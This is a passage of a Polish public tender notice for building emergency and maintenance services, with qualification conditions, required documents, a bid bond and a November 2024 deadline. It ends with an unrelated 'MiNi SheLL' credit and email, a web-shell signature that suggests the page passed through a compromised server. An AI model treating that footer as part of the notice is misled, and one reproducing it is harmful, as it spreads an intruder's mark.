class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1.1. nie podlegają wykluczeniu;<br/>1.1.2. spełniają warunki udziału w postępowaniu dotyczące:<br/> 1.1.2.1.kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynik z odrębnych przepisów – w odniesieniu do tego warunku zamawiający nie określa minimalnych poziomów zdolności;<br/>1.1.2.2	sytuacji ekonomicznej lub finansowej - posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności objętej przedmiotem zamówienia. Minimalną sumę gwarancyjną ubezpieczenia określa się na kwotę 150.000,00 zł.<br/>1.1.2.3.	zdolności technicznej lub zawodowej, tj.: dysponują lub będą dysponowali pracownikami gwarantującymi prawidłowe wykonanie zamówienia, w tym:<br/>a)	dysponują osobami, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi: <br/>-	w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych,<br/>-	w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowo-kanalizacyjnych,<br/>-	w specjalności instalacyjnej w zakresie instalacji i urządzeń gazowych,<br/>lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; <br/>b)	dysponują odpowiednią liczbą osób wykonujących prace konserwacyjno - remontowe (min. <br/>5 osób) gwarantującą prawidłowe wykonanie zamówienia; <br/>c)	będą dysponować pomieszczeniem warsztatowym wraz z zapleczem magazynowym umożliwiającym przechowanie podstawowego sprzętu i zapasu materiałów niezbędnych do wykonywania prac w zakresie robót budowlanych oraz instalacji: elektrycznych, wodociągowo - kanalizacyjnych i gazowych, wyposażone w linię telefoniczną i faks;<br/>d) wykonują lub wykonywali w okresie 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, przez okres minimum 12 miesięcy usługi w zakresie pogotowia technicznego w co najmniej 10-ciu budynkach, przy czym wymaga się, aby były to budynki wielorodzinne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, że nie podlega wykluczeniu w postępowaniu (załącznik nr nr 6 do SWZ) <br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>2.1	Oświadczenie, w zakresie art. 108 ust.1 pkt 5 ustawy Pzp., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów, z innym Wykonawcą, który złożył odrębna ofertę albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 8 do SWZ)<br/>2.2	Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.1 ustawy Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust.1 pkt. 1 ÷ 4,6 ustawy Pzp i art.7 ust.1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (załącznik nr 9 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie, że spełnia warunki udziału w postępowaniu (załącznik nr 5 do SWZ) <br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>2.3	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia publicznego , a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi (załącznik nr 3 do SWZ)<br/>2.4	Opłacona polisa, w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej zakresie prowadzonej działano liści związanej <br/>z przedmiotem zamówienia na wartość nie mniejszą niż 150 000,00 zł.<br/>2.5	Przedłożenie dokumentu poświadczającego dysponowanie pomieszczeniem warsztatowym wraz z zapleczem magazynowym umożliwiającym przechowanie podstawowego sprzętu i zapasu materiałów niezbędnych do wykonywania prac w zakresie robót budowlanych oraz instalacji: elektrycznych, wodociągowo - kanalizacyjnych i gazowych, wyposażone w linię telefoniczną i faks;<br/>2.6	Wykaz usług wykonanych przez Wykonawcę które wykonują lub wykonywali w okresie 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, przez okres minimum 12 miesięcy usługi w zakresie pogotowia technicznego <br/>w co najmniej 10-ciu budynkach, przy czym wymaga się, aby były to budynki wielorodzinne. (załącznik nr 4 do SWZ)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium w wysokości 14 500,00 zł należy wnieść w terminie do dnia 05.11.2024 r. do godziny 10:00 <br/>w jednej lub kilku następujących formach:<br/>a)	W pieniądzu,<br/>b)	W gwarancjach bankowych,<br/>c)	W gwarancjach ubezpieczeniowych,<br/>d)	W poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust.5 pkt.2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o którym mowa w art. 112 ust.2 pkt.2) ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden <br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>4.3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi , do realizacji których te zdolności są wymagane.<br/>4.4. W przypadku, o którym mowa Rozdziale I, ust. 4, pkt 4.2 i 4.3. SWZ .Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika , które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-35325632-dcec-4fc4-b625-e899d43cb278</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-05 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com